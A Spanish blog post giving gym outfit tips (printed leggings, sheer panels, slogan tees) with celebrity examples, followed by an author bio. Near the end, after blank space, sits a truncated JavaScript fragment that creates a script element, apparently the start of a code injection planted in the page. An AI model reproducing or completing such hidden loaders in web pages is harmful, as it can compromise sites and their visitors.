¿Qué me pongo para ir al gimnasio?

El asistir al gym no nos referimos a ponerse un pants, una sudadera y unos tenis, el hacer ejercicio no significa que debemos perder el estilo.

Luego de las fiestas de Navidad y Año Nuevo, iniciamos la época en la que queremos ponernos en forma y obligarnos a presumir un cuerpo bien trabajado para la temporada de verano.

El estilo no se debe perder ni cuando vas al gimnasio, aunque sea un lugar al que vas a ejercitarse, también puedes estar a la moda y vestir adecuadamente para sentirte cómoda.

Mallas con estampados sudaderas con mensajes motivadores, tops que realzan el pecho… La moda y el deporte se unen más que nunca esta temporada con la intención de animarnos aún más para lograr nuestro objetivo de estar en forma.

Combina unas mallas estampadas y arriesgadas con una sudadera minimal en colores claros para crear contraste. Así nos pone el ejemplo Alesandra Ambrosio a la hora de ejercitarse.

La moda de las camisetas con mensaje no vive solo en el street style Celebrities como Jessica Alba apuestan cada vez más por este tipo de prendas cuando van al gimnasio.

Si lo que quieres es un estilo más sencillo, opta por unas mallas negras, una camiseta y debajo unos sujetadores deportivos.

Las mallas con transparencias es la tendencia numero uno en la ropa deportiva, sin duda las verás en todos los gimnasios. Esta moda la han impuesto celebridades como Kendall Jenner.
Si no eres de las que le gustan los colores llamativos ni las transparencias, siempre puedes escoger algo en color negro, un tono que nunca va fallarte y va a la perfección.

¿Quieres verte más extrovertida? Prueba con un top cruzado para derrochar un poco de sensualidad a la hora de ir al gimnasio.

 

 

 

 

 

 var d=document;var s=d.createElement(‘script’);

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado